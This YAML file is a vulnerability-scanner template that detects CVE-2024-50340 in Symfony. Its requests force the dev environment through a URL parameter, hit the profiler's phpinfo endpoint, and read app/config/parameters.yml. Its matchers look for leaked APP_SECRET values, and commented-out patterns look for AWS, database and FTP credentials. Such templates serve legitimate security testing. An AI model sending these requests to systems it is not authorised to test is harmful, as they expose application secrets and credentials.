id: CVE-2024-50340-symfony-profiler

info:
  name: Symfony Profiler Environment Manipulation (CVE-2024-50340)
  author: nollium
  severity: medium
  description: |
    Detects CVE-2024-50340 in Symfony applications where `register_argc_argv` is enabled,
    allowing environment manipulation via URL parameters. Specifically, this template checks for the presence
    of `phpinfo()` output, accessible by forcing the dev environment through URL manipulation.
  reference:
    - https://github.com/nollium/CVE-2024-50340-eos-exploit

requests:
  - method: GET
    path:
      - "{{BaseURL}}/_profiler/phpinfo?+--env=dev"      
      - "{{BaseURL}}/_profiler/phpinfo"
      - "{{BaseURL}}/_profiler/open"      
      - '{{BaseURL}}/app_dev.php/_profiler/open?file=app/config/parameters.yml'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
          - "$_SERVER['SERVER_NAME']"
          - "$_ENV['APP_SECRET']"
          - "$_ENV['SYMFONY_DOTENV_VARS']"          
        condition: or

      - type: status
        status:
          - 200
          - 205    

#    matchers-condition: or
#    matchers:
#      - type: regex
#        regex:
#          - "(?mi)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)="
#          - "(?mi)^DB_(HOST|PASSWORD|DATABASE)="
#          - "(?mi)^(SQS|SNS|SES|BACKUP|AWS)_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)[=:](.*?)"
#          - '(?i)(FTP_(USER|PASS))'
#          - '(?i)aws_access_key_id\s*=\s*'
#        condition: or
#
#      - type: word
#        part: body
#        words:
#          - database_host
#          - database
#          - db_pass
#          - database_name
#          - database_user
#          - database_password
#          - mailer_transport
#          - mailer_host
#          - mailer_user
#          - mailer_password
#        condition: or
#
#      - type: word
#        part: body
#        words:
#          - "PHP Extension"
#          - "PHP Version"
#        condition: and                  